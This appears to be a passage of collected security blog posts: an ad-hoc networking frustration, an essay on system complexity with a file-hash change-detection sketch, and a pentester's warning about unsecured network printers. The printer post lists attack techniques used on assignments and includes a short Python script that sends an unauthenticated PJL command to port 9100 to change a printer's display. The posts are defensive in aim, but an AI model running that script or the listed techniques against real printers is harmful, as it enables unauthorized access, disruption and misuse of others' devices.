So far, the best clue I received concerned the “Bridge connections” option.  I had frequently seen it, but I somehow never thought to have two networks “selected” when I tried it.  Even then, I might have missed the opportunity.  I got the usual error message, but it suddenly dawned on me that ICS might conflict with it.  (Given that everybody else had been telling me to turn ICS on.)  So, I turned ICS off, and, sure enough, Bridge connections was happy to do just that.

I still have no clue what has been set, and where …


The complexity of the end-user’s computer

Over the years I’ve had to learn a lot about computers.  I’ve written device drivers for the All-in-One system under VAX/VMS.  I know what to do with MS-DOS’s AUTOEXEC.BAT and CONFIG.SYS files.  I’ve learned more word processors than I can remember the names of.  I was using UNIX when that was still a big deal.  Because of some research that was important in the early days of computer viruses, I know a question that will stump any computer forensics expert on the witness stand.

I’m a little afraid of my new netbook.  Within a few months I’ll need to buy a new desktop, and I know I’m going to be more afraid of it.

In the DOS days, I knew pretty much everything that was going on in it.  I knew the hardware, and the system files.  I even had a bunch of tools that would let me see the raw disk and memory.  It was tedious to do so, but it was possible.

Even when Windows 3 and 95 came out, I understood that this was simply a new interface.  I could still examine the system, and make sure everything was as it should be.  I could have confidence and assurance in the computer.  True, there wasn’t any serious protection on it, but, since I knew the full system, I could examine it regularly and make sure that nothing untoward was happening.

Then came Windows NT.  There was extra protection on the system, but suddenly, every time you turned the system on, 400 files (a number of them system files) got modified.  Change detection lost its value as a security measure.
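The sort of change detection I’m talking about can be sketched in a few lines.  (Modern Python and SHA-256, purely for illustration; the tools of the DOS era used simpler checksums, and the function names here are my own.)

```python
import hashlib
import os

def snapshot(root):
    """Return {path: SHA-256 hex digest} for every file under root.

    This is the baseline: run it once on a known-good system and save
    the result somewhere the system itself cannot alter.
    """
    digests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as f:
                # Hash in chunks so large files don't exhaust memory.
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[path] = h.hexdigest()
    return digests

def changed_files(baseline, current):
    """List files whose contents differ from the baseline, or are new."""
    return sorted(p for p, d in current.items() if baseline.get(p) != d)
```

On a DOS machine, a re-scan that reported any changed system file meant something untoward.  On NT, with hundreds of files legitimately changing at every boot, a report like this tells you nothing.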

Then the later members of that family started adding ties into applications and back again.  And with Windows XP, for the first time, when a friend’s computer got infected, the only solution was to re-install the system.

Complexity is the enemy of security.   However, this goes deeper.  These days we have huge numbers of people using devices that are, as far as they are concerned, magic.  Don’t get me wrong.  I think magic is a lot of fun.  It’s just that magic seems to be defined as inherently unknowable, and these users are not only content with, but actually proud of, their ignorance.

This is dangerous.  When you assume that you cannot know, that seems to absolve you of any responsibility for even trying.  You punch the icons, and do things with no understanding of the consequences.

At the moment, I am trying to set up an ad-hoc wireless network between some of my machines.  I’m not having much luck.  I’ve researched the process, and had suggestions from friends.  I’ve been working at it, off and on, for months.  It still isn’t working.  I can’t find the information I need, either on the process, or in regard to the actual settings on my machines.

Ignorance isn’t bliss.  It’s dangerous.  If I, as a computer, communications, and security specialist of decades’ standing, can’t get a simple (well, not quite that simple) network set up, how can we give advice to the novice users of the world on how to keep themselves safe?


Printers, the forgotten threat

It seems that in this day and age, people have finally grasped why it’s a good idea to patch systems regularly, run an anti-virus application, and have funky network appliances like firewalls and Intrusion Detection Systems, which is a really great move in the right direction.

One thing that I will never understand, though, is that people will spend a fortune on new security tools and appliances, and then forget the basics.

Please, people, remember to lock down the items on your network that may seem insignificant to you, as nine times out of ten they are a foothold for a hacker. A prime example of this would be printers. In the past I have managed to obtain really sensitive information from printers attached to networks in their default state, and also to waste valuable time and company resources.

Here are a few of the things that I’ve done on various assignments over the years with regard to printers:

- Modify the default web console pages, and load them up with browser exploits

- Find valuable documents saved as files on the printers

- Use the printers as zombie hosts for nmap idle (“zombie”) network scans

- Tie up the printer for a day or so printing out the contents of my hard drive

- Waste paper and ink from doing the above

- Leave obscene messages on the console display

- Shut down the printer and fake the logon page to accomplish all of the above
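For the curious, the console-display trick in the list above needs nothing more than an open TCP port. Most network printers accept PJL (HP’s Printer Job Language) on the standard raw-printing port, 9100, with no authentication at all in their default state. A sketch only: the printer address below is hypothetical, and as I recall RDYMSG is the PJL command that sets the front-panel message.

```python
import socket

PRINTER_HOST = "192.168.0.50"  # hypothetical printer address
PJL_PORT = 9100                # standard raw ("JetDirect") printing port

def set_display_message(host, message, port=PJL_PORT):
    """Send a PJL RDYMSG command, which changes the text shown on the
    printer's front-panel display. No credentials are required on a
    printer in its default state."""
    payload = (
        "\x1b%-12345X"                                    # enter PJL mode
        + '@PJL RDYMSG DISPLAY = "' + message + '"\r\n'   # set panel text
        + "\x1b%-12345X"                                  # exit PJL mode
    ).encode("ascii")
    with socket.create_connection((host, port), timeout=5) as conn:
        conn.sendall(payload)
    return payload

# Example (only against printers you are authorized to test):
# set_display_message(PRINTER_HOST, "INSERT COIN")
```

Ten lines of code, which is exactly why leaving port 9100 open to the whole network is a bad idea.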

Here’s a pretty useful link for all those with HP printers on their estate as well.

So, going forward, please remember that if it’s attached to your network, it needs to be secured. Most printers these days come with security configuration options, but they have to be enabled, so take the extra five minutes to make the world a better place.